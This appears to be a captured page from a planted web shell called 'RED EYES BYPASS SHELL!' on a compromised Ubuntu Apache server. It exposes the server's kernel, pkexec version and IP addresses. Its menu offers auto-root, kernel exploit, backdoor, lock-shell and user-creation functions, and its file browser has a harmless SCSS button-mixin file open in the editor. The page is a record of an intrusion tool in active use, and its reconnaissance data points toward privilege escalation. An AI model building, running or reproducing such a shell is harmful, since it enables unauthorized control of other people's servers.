Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
pdpa /
src /
scss /
free /
mixins /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
_buttons.scss
1.7
KB
-rwxr-xr-x
_ripple.scss
501
B
-rwxr-xr-x
_table-variants.scss
174
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _buttons.scss
// Button variant @mixin button-variant-mdb($background) { color: set-notification-text-color($background); background-color: $background; &:hover { color: set-notification-text-color($background); background-color: darken($background, 7.5%); } &:focus, &.focus { color: set-notification-text-color($background); background-color: darken($background, 7.5%); } .btn-check:checked + &, .btn-check:active + &, &:active, &.active, .show > &.dropdown-toggle { color: set-notification-text-color($background); background-color: darken($background, 20%); &:focus { box-shadow: $btn-focus-box-shadow; } } &:disabled, &.disabled { color: set-notification-text-color($background); background-color: $background; } } // Button variant outline @mixin button-outline-variant-mdb($color) { color: $color; border-color: $color; &:hover { color: $color; background-color: rgba(0, 0, 0, 0.02); } &:focus, &.focus { color: $color; background-color: transparent; } &:active, &.active, &.dropdown-toggle.show { color: $color; background-color: transparent; &:focus { box-shadow: none; } } &:disabled, &.disabled { color: $color; } } // Button sizes @mixin button-size-mdb( $padding-top, $padding-right, $padding-bottom, $padding-left, $font-size, $line-height ) { padding: $padding-top $padding-right $padding-bottom $padding-left; font-size: $font-size; line-height: $line-height; } // Button size variant outline @mixin button-outline-size-mdb($padding-top, $padding-right, $padding-bottom, $padding-left) { padding: $padding-top $padding-right $padding-bottom $padding-left; }
Close